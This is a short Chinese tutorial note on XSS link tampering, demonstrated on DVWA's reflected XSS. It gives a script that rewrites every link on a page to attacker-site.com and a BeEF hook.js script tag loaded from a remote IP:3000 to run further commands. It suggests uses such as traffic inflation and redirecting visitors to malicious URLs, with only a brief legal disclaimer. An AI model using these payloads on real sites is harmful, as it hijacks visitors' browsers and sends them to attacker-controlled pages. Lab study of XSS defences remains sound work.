0X01 JS代码讲解
window.onload 当窗口加载时,执行匿名函数。
使用for循环遍历所有获得的链接a标签。
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://attacker-site.com/";}
}
</script>
0X02 XSS篡改链接
将篡改代码注入到对应的XSS位置。以DVWA 反射XSS为例。
0X03 篡改链接指向不良URL
刷流量,某些站点的重定向。
https://weibo.com/
0X04 篡改链接指向恶意URL
Beef 进行恶意链接生成,以及利用hook.js执行其他命令。
<script src=”http://IP:3000/hook.js”></script>
(遵纪守法,笔记只是记录实验思路,进去了与本文无关)
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。